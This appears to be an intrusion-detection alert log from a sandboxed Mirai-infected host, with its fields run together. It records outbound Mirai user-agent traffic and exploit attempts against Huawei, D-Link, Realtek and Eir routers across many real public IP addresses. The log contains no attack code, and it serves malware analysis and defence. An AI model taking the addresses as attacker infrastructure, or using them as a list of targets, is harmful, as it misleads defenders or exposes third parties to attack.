                            192.168.2.23188.166.205.3445960802846457 10/23/22-17:58:20.257070TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4596080192.168.2.23188.166.205.34
                            192.168.2.2385.121.125.18157090802846457 10/23/22-17:57:00.289486TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5709080192.168.2.2385.121.125.181
                            192.168.2.23156.229.208.19857412802841623 10/23/22-17:57:12.574073TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5741280192.168.2.23156.229.208.198
                            192.168.2.23181.56.189.19453136802846380 10/23/22-17:58:01.079461TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5313680192.168.2.23181.56.189.194
                            192.168.2.2382.180.164.14853386802846380 10/23/22-17:58:06.256755TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5338680192.168.2.2382.180.164.148
                            192.168.2.2318.132.14.16834498802841623 10/23/22-17:58:28.070323TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3449880192.168.2.2318.132.14.168
                            192.168.2.2393.124.81.2135899675472835222 10/23/22-17:58:21.369314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)589967547192.168.2.2393.124.81.213
                            192.168.2.232.19.246.6937664802846457 10/23/22-17:57:03.277028TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3766480192.168.2.232.19.246.69
                            192.168.2.2395.179.188.18048038802027121 10/23/22-17:58:24.017151TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4803880192.168.2.2395.179.188.180
                            192.168.2.2382.66.59.9058862802846380 10/23/22-17:57:07.268963TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5886280192.168.2.2382.66.59.90
                            192.168.2.23112.121.152.17648986802027121 10/23/22-17:57:28.421617TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4898680192.168.2.23112.121.152.176
                            192.168.2.2346.255.80.11041464802846457 10/23/22-17:58:15.382045TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4146480192.168.2.2346.255.80.110
                            192.168.2.23213.143.19.4234100802846380 10/23/22-17:56:49.782645TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3410080192.168.2.23213.143.19.42
                            192.168.2.23200.26.189.21859532802846380 10/23/22-17:58:09.192519TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5953280192.168.2.23200.26.189.218
                            192.168.2.2323.27.89.18441918802841623 10/23/22-17:57:20.664517TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4191880192.168.2.2323.27.89.184
                            192.168.2.2388.99.26.3041148802027121 10/23/22-17:57:52.289831TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4114880192.168.2.2388.99.26.30
                            192.168.2.23154.92.86.21054124802841623 10/23/22-17:57:44.711261TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5412480192.168.2.23154.92.86.210
                            192.168.2.2388.129.16.3059434802027121 10/23/22-17:58:02.095359TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5943480192.168.2.2388.129.16.30
                            192.168.2.2382.64.71.13854430802846380 10/23/22-17:58:06.167062TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5443080192.168.2.2382.64.71.138
                            192.168.2.232.17.137.4747052802846457 10/23/22-17:57:07.090557TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4705280192.168.2.232.17.137.47
                            192.168.2.2388.221.7.22439098802027121 10/23/22-17:57:54.655484TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3909880192.168.2.2388.221.7.224
                            192.168.2.2389.47.197.2750758802846457 10/23/22-17:58:07.981171TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5075880192.168.2.2389.47.197.27
                            192.168.2.2395.217.188.22041578802027121 10/23/22-17:57:33.447053TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4157880192.168.2.2395.217.188.220
                            192.168.2.2395.101.242.17936518802027121 10/23/22-17:57:16.265202TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3651880192.168.2.2395.101.242.179
                            192.168.2.2388.209.237.10058060802027121 10/23/22-17:57:40.651414TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5806080192.168.2.2388.209.237.100
                            192.168.2.2395.204.30.11433854802027121 10/23/22-17:57:54.944174TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3385480192.168.2.2395.204.30.114
                            192.168.2.23213.85.225.24345690802846380 10/23/22-17:57:54.138966TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4569080192.168.2.23213.85.225.243
                            192.168.2.2395.216.173.16454520802027121 10/23/22-17:57:43.887723TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5452080192.168.2.2395.216.173.164
                            192.168.2.2380.92.18.23346846802846457 10/23/22-17:56:52.759797TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4684680192.168.2.2380.92.18.233
                            192.168.2.2395.213.212.12255564802027121 10/23/22-17:56:53.181960TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5556480192.168.2.2395.213.212.122
                            192.168.2.2385.214.139.14451614802846457 10/23/22-17:57:16.979802TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5161480192.168.2.2385.214.139.144
                            192.168.2.23206.82.113.4935862802846380 10/23/22-17:58:36.921850TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3586280192.168.2.23206.82.113.49
                            192.168.2.2385.214.152.13042676802846457 10/23/22-17:57:16.980121TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4267680192.168.2.2385.214.152.130
                            192.168.2.2346.22.222.25435020802846457 10/23/22-17:58:23.947115TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3502080192.168.2.2346.22.222.254
                            192.168.2.2382.65.176.17357190802846380 10/23/22-17:58:06.158919TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5719080192.168.2.2382.65.176.173
                            192.168.2.2385.182.250.4443018802846457 10/23/22-17:58:17.675581TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4301880192.168.2.2385.182.250.44
                            192.168.2.2395.160.59.6155138802027121 10/23/22-17:57:31.280934TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5513880192.168.2.2395.160.59.61
                            192.168.2.23184.30.226.16533914802841623 10/23/22-17:58:35.989286TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3391480192.168.2.23184.30.226.165
                            192.168.2.2361.123.26.10852008802846457 10/23/22-17:57:03.031309TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5200880192.168.2.2361.123.26.108
                            192.168.2.23112.217.203.16246600802027121 10/23/22-17:57:10.416403TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4660080192.168.2.23112.217.203.162
                            192.168.2.2395.167.23.1255730802027121 10/23/22-17:57:31.353965TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5573080192.168.2.2395.167.23.12
                            192.168.2.2385.164.44.5054342802846457 10/23/22-17:58:17.724388TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5434280192.168.2.2385.164.44.50
                            192.168.2.23213.239.253.5942700802846380 10/23/22-17:57:37.863396TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4270080192.168.2.23213.239.253.59
                            192.168.2.2395.101.218.24846982802027121 10/23/22-17:57:45.110477TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4698280192.168.2.2395.101.218.248
                            192.168.2.2395.84.196.9649294802027121 10/23/22-17:58:21.906560TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4929480192.168.2.2395.84.196.96
                            192.168.2.23206.109.178.14536532802846380 10/23/22-17:57:18.686267TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3653280192.168.2.23206.109.178.145
                            192.168.2.23178.239.171.20749492802846380 10/23/22-17:58:13.489666TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4949280192.168.2.23178.239.171.207
                            192.168.2.2337.187.222.7035378802846457 10/23/22-17:57:31.531264TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3537880192.168.2.2337.187.222.70
                            192.168.2.2395.80.93.16857048802027121 10/23/22-17:57:23.588409TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5704880192.168.2.2395.80.93.168
                            192.168.2.23122.114.11.17535594802846457 10/23/22-17:58:34.721796TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3559480192.168.2.23122.114.11.175
                            192.168.2.2382.219.198.2643082802846380 10/23/22-17:56:39.308865TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4308280192.168.2.2382.219.198.26
                            192.168.2.2395.143.190.3455920802027121 10/23/22-17:57:13.055323TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5592080192.168.2.2395.143.190.34
                            192.168.2.23112.215.157.14548604802027121 10/23/22-17:57:52.063667TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4860480192.168.2.23112.215.157.145
                            192.168.2.23112.74.229.25358570802027121 10/23/22-17:57:05.100364TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5857080192.168.2.23112.74.229.253
                            192.168.2.23213.165.238.6535306802846380 10/23/22-17:57:58.462353TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3530680192.168.2.23213.165.238.65
                            192.168.2.23164.138.220.3650862802846457 10/23/22-17:58:34.386628TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5086280192.168.2.23164.138.220.36
                            192.168.2.2318.185.14.12156320802835221 10/23/22-17:56:59.044847TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5632080192.168.2.2318.185.14.121
                            192.168.2.23195.52.223.8741530802846457 10/23/22-17:56:43.200335TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4153080192.168.2.23195.52.223.87
                            192.168.2.2395.90.158.12535632802027121 10/23/22-17:56:53.300379TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3563280192.168.2.2395.90.158.125
                            192.168.2.2385.187.250.18139796802846457 10/23/22-17:57:41.232614TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3979680192.168.2.2385.187.250.181
                            192.168.2.23120.92.21.7239306802835222 10/23/22-17:57:41.496216TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3930680192.168.2.23120.92.21.72
                            192.168.2.2384.23.57.1943080802846457 10/23/22-17:58:32.966323TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4308080192.168.2.2384.23.57.19
                            192.168.2.23213.154.237.17937630802846380 10/23/22-17:58:33.198325TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3763080192.168.2.23213.154.237.179
                            192.168.2.23188.234.248.2642208802846457 10/23/22-17:57:00.290264TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4220880192.168.2.23188.234.248.26
                            192.168.2.23188.12.80.16456698802846457 10/23/22-17:57:47.843208TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5669880192.168.2.23188.12.80.164
                            192.168.2.23206.189.125.23639944802846380 10/23/22-17:57:29.327768TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3994480192.168.2.23206.189.125.236
                            192.168.2.2380.237.252.8960790802846380 10/23/22-17:57:43.250723TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6079080192.168.2.2380.237.252.89
                            192.168.2.2395.230.44.258844802027121 10/23/22-17:58:17.333711TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5884480192.168.2.2395.230.44.2
                            192.168.2.2388.151.99.19552616802027121 10/23/22-17:58:09.667670TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5261680192.168.2.2388.151.99.195
                            192.168.2.2382.180.174.21033622802846380 10/23/22-17:57:55.380078TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3362280192.168.2.2382.180.174.210
                            192.168.2.23206.237.244.17037386802846380 10/23/22-17:58:39.795290TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3738680192.168.2.23206.237.244.170
                            192.168.2.2345.195.66.8047360600012835222 10/23/22-17:58:16.590535TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4736060001192.168.2.2345.195.66.80
                            192.168.2.23213.33.159.8649974802846380 10/23/22-17:56:58.220523TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4997480192.168.2.23213.33.159.86
                            192.168.2.2383.136.68.7054668802846380 10/23/22-17:58:27.227485TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5466880192.168.2.2383.136.68.70
                            192.168.2.2395.154.87.14959382802027121 10/23/22-17:58:13.003572TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5938280192.168.2.2395.154.87.149
                            192.168.2.23211.230.198.2345602475472835222 10/23/22-17:58:21.207012TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)560247547192.168.2.23211.230.198.234
                            192.168.2.2395.101.95.5336712802027121 10/23/22-17:58:07.322514TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3671280192.168.2.2395.101.95.53
                            192.168.2.23169.60.241.2756906802846380 10/23/22-17:57:51.921872TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5690680192.168.2.23169.60.241.27
                            192.168.2.2388.215.75.18958826802027121 10/23/22-17:57:52.297848TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5882680192.168.2.2388.215.75.189
                            192.168.2.2395.220.219.560466802027121 10/23/22-17:56:53.331054TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6046680192.168.2.2395.220.219.5
                            192.168.2.2388.148.49.13946250802027121 10/23/22-17:56:55.700368TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4625080192.168.2.2388.148.49.139
                            192.168.2.23164.90.174.9746544802846457 10/23/22-17:58:34.368239TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4654480192.168.2.23164.90.174.97
                            192.168.2.2395.101.48.3759692802027121 10/23/22-17:58:39.900557TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5969280192.168.2.2395.101.48.37
                            192.168.2.23206.54.174.7355984802846380 10/23/22-17:57:56.384128TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5598480192.168.2.23206.54.174.73
                            192.168.2.2389.161.176.11846056802846457 10/23/22-17:58:07.888196TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4605680192.168.2.2389.161.176.118
                            192.168.2.23122.228.200.11355490528692027339 10/23/22-17:57:13.843759TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5549052869192.168.2.23122.228.200.113
                            192.168.2.2395.175.123.8452272802027121 10/23/22-17:57:21.047423TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5227280192.168.2.2395.175.123.84
                            192.168.2.23178.239.73.2643444802846380 10/23/22-17:57:27.953857TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4344480192.168.2.23178.239.73.26
                            192.168.2.23112.16.232.5048798802027121 10/23/22-17:57:07.672992TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4879880192.168.2.23112.16.232.50
                            192.168.2.2395.56.88.15132876802027121 10/23/22-17:57:10.508381TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3287680192.168.2.2395.56.88.151
                            192.168.2.2337.61.176.21852240802846457 10/23/22-17:57:07.225214TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5224080192.168.2.2337.61.176.218
                            192.168.2.2389.252.128.19853072802846457 10/23/22-17:57:41.195924TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5307280192.168.2.2389.252.128.198
                            192.168.2.2323.247.23.14953492802835222 10/23/22-17:58:09.588805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5349280192.168.2.2323.247.23.149
                            192.168.2.23200.143.59.9050554802846380 10/23/22-17:58:22.268112TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5055480192.168.2.23200.143.59.90
                            192.168.2.23156.234.151.23938852802835221 10/23/22-17:58:29.254030TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)3885280192.168.2.23156.234.151.239
                            192.168.2.2395.167.133.6146242802027121 10/23/22-17:57:07.985971TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4624280192.168.2.2395.167.133.61
                            192.168.2.2388.99.163.16738284802027121 10/23/22-17:56:55.636157TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3828480192.168.2.2388.99.163.167
                            192.168.2.2395.79.100.12842722802027121 10/23/22-17:57:10.399522TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4272280192.168.2.2395.79.100.128
                            192.168.2.232.19.40.24756212802846457 10/23/22-17:57:20.936290TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5621280192.168.2.232.19.40.247
                            192.168.2.2384.19.116.20152724802846457 10/23/22-17:58:32.924272TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5272480192.168.2.2384.19.116.201
                            192.168.2.235.9.254.20146138802846457 10/23/22-17:57:35.597658TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4613880192.168.2.235.9.254.201
                            192.168.2.2395.233.150.21146914802027121 10/23/22-17:58:15.336128TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4691480192.168.2.2395.233.150.211
                            192.168.2.23122.226.189.7956512528692027339 10/23/22-17:58:20.081753TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5651252869192.168.2.23122.226.189.79
                            192.168.2.23178.73.253.21847716802846380 10/23/22-17:58:27.264197TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4771680192.168.2.23178.73.253.218
                            192.168.2.232.23.137.18941384802846457 10/23/22-17:57:28.774429TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4138480192.168.2.232.23.137.189
                            192.168.2.2395.169.220.5645852802027121 10/23/22-17:58:21.906116TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4585280192.168.2.2395.169.220.56
                            192.168.2.23171.236.63.23657642802846457 10/23/22-17:58:39.917870TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5764280192.168.2.23171.236.63.236
                            192.168.2.23200.234.188.12334796802846380 10/23/22-17:57:13.939438TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3479680192.168.2.23200.234.188.123
                            192.168.2.23178.217.249.15446152802846380 10/23/22-17:57:28.012879TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4615280192.168.2.23178.217.249.154
                            192.168.2.2346.228.150.8633954802846457 10/23/22-17:58:15.342921TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3395480192.168.2.2346.228.150.86
                            192.168.2.2383.59.120.5057516802846380 10/23/22-17:58:19.929373TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5751680192.168.2.2383.59.120.50
                            192.168.2.2388.208.224.2144718802027121 10/23/22-17:58:21.826412TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4471880192.168.2.2388.208.224.21
                            192.168.2.23181.212.40.4760054802846380 10/23/22-17:57:49.035895TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6005480192.168.2.23181.212.40.47
                            192.168.2.2388.198.95.19743626802027121 10/23/22-17:57:02.420013TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4362680192.168.2.2388.198.95.197
                            192.168.2.2382.223.39.24847384802846380 10/23/22-17:56:39.305609TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4738480192.168.2.2382.223.39.248
                            192.168.2.23149.96.34.12645698802835221 10/23/22-17:57:38.794574TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)4569880192.168.2.23149.96.34.126
                            192.168.2.2388.221.203.6947578802027121 10/23/22-17:58:21.830071TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4757880192.168.2.2388.221.203.69
                            192.168.2.2354.191.47.17559730802841623 10/23/22-17:57:16.701947TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5973080192.168.2.2354.191.47.175
                            192.168.2.23195.113.230.17643946802846457 10/23/22-17:57:59.921521TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4394680192.168.2.23195.113.230.176
                            192.168.2.2370.126.129.1215738075472023548 10/23/22-17:58:11.467563TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE573807547192.168.2.2370.126.129.121
                            192.168.2.2380.228.47.4556432802846380 10/23/22-17:58:39.130268TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5643280192.168.2.2380.228.47.45
                            192.168.2.2395.173.229.2035368802027121 10/23/22-17:58:12.841339TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3536880192.168.2.2395.173.229.20
                            192.168.2.2395.77.121.22134920802027121 10/23/22-17:57:16.182729TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3492080192.168.2.2395.77.121.221
                            192.168.2.23195.116.63.24947134802846457 10/23/22-17:58:10.247956TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4713480192.168.2.23195.116.63.249
                            192.168.2.23181.126.209.2451032802846380 10/23/22-17:57:11.279334TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5103280192.168.2.23181.126.209.24
                            192.168.2.2395.141.143.15050112802027121 10/23/22-17:58:17.393076TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5011280192.168.2.2395.141.143.150
                            192.168.2.2372.224.53.165895275472023548 10/23/22-17:58:32.325556TCP2023548ET EXPLOIT Eir D1000 Modem CWMP Exploit RCE589527547192.168.2.2372.224.53.16
                            192.168.2.23104.69.27.12234794802841623 10/23/22-17:57:25.409148TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3479480192.168.2.23104.69.27.122
                            192.168.2.23178.62.5.24444888802846380 10/23/22-17:57:38.467376TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4488880192.168.2.23178.62.5.244
                            192.168.2.2395.211.106.2050420802027121 10/23/22-17:58:21.852505TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5042080192.168.2.2395.211.106.20
                            192.168.2.2388.215.75.18959232802027121 10/23/22-17:57:57.629258TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5923280192.168.2.2388.215.75.189
                            192.168.2.23176.113.103.19454454802841623 10/23/22-17:57:20.378263TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5445480192.168.2.23176.113.103.194
                            192.168.2.2395.142.172.24238786802027121 10/23/22-17:57:28.457799TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3878680192.168.2.2395.142.172.242
                            192.168.2.232.17.224.18260416802846457 10/23/22-17:57:07.079283TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)6041680192.168.2.232.17.224.182
                            192.168.2.2388.3.76.5746230802027121 10/23/22-17:58:05.207821TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4623080192.168.2.2388.3.76.57
                            192.168.2.2389.218.185.10243754802846457 10/23/22-17:57:56.017518TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4375480192.168.2.2389.218.185.102
                            192.168.2.2382.25.111.4435170802846380 10/23/22-17:57:07.339836TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3517080192.168.2.2382.25.111.44
                            192.168.2.2366.39.4.2742812802841623 10/23/22-17:58:39.367963TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4281280192.168.2.2366.39.4.27
                            192.168.2.2382.64.189.9633426802846380 10/23/22-17:56:39.282434TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3342680192.168.2.2382.64.189.96
                            192.168.2.2395.100.5.19460618802027121 10/23/22-17:58:30.360553TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)6061880192.168.2.2395.100.5.194
                            192.168.2.2388.221.10.1349488802027121 10/23/22-17:57:52.295094TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4948880192.168.2.2388.221.10.13
                            192.168.2.2395.217.161.8852038802027121 10/23/22-17:58:15.276855TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5203880192.168.2.2395.217.161.88
                            192.168.2.2337.247.109.2546566802846457 10/23/22-17:57:31.330217TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4656680192.168.2.2337.247.109.25
                            192.168.2.2395.131.28.13339304802027121 10/23/22-17:57:33.463534TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3930480192.168.2.2395.131.28.133
                            192.168.2.2395.141.96.836304802027121 10/23/22-17:58:39.682437TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3630480192.168.2.2395.141.96.8
                            192.168.2.2382.223.14.6151966802846380 10/23/22-17:57:07.292473TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5196680192.168.2.2382.223.14.61
                            192.168.2.23200.84.15.11857298802835221 10/23/22-17:57:38.963880TCP2835221ETPRO EXPLOIT D-LINK Router DSL-2750B RCE M2 - Outbound (metasploit version)5729880192.168.2.23200.84.15.118
                            192.168.2.2395.59.181.3949176802027121 10/23/22-17:57:34.602784TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4917680192.168.2.2395.59.181.39
                            192.168.2.2352.212.146.24040500802841623 10/23/22-17:57:48.276349TCP2841623ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4050080192.168.2.2352.212.146.240
                            192.168.2.2395.86.88.2758636802027121 10/23/22-17:57:23.567467TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5863680192.168.2.2395.86.88.27
                            192.168.2.23197.221.165.4257110802835222 10/23/22-17:57:40.406047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5711080192.168.2.23197.221.165.42
                            192.168.2.2395.142.74.13140848802027121 10/23/22-17:58:12.741253TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4084880192.168.2.2395.142.74.131
                            192.168.2.23178.135.107.241496802846380 10/23/22-17:57:55.445341TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4149680192.168.2.23178.135.107.2
                            192.168.2.2385.214.218.22245658802846457 10/23/22-17:58:37.501336TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4565880192.168.2.2385.214.218.222
                            192.168.2.23197.148.72.5134752802835222 10/23/22-17:57:20.141409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3475280192.168.2.23197.148.72.51
                            192.168.2.23188.225.77.3434432802846457 10/23/22-17:58:07.947814TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3443280192.168.2.23188.225.77.34
                            192.168.2.2382.223.97.11250116802846380 10/23/22-17:58:06.179076TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5011680192.168.2.2382.223.97.112
                            192.168.2.23112.3.27.13148980802027121 10/23/22-17:58:25.356484TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4898080192.168.2.23112.3.27.131
                            192.168.2.235.19.248.8637522802846457 10/23/22-17:57:08.432868TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)3752280192.168.2.235.19.248.86
                            192.168.2.23178.128.202.7153272802846380 10/23/22-17:57:38.466341TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5327280192.168.2.23178.128.202.71
                            192.168.2.2380.67.92.20040860802846380 10/23/22-17:58:39.133161TCP2846380ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)4086080192.168.2.2380.67.92.200
                            192.168.2.2385.13.140.10356510802846457 10/23/22-17:57:00.155795TCP2846457ETPRO TROJAN ELF/Mirai User-Agent Observed (Outbound)5651080192.168.2.2385.13.140.103
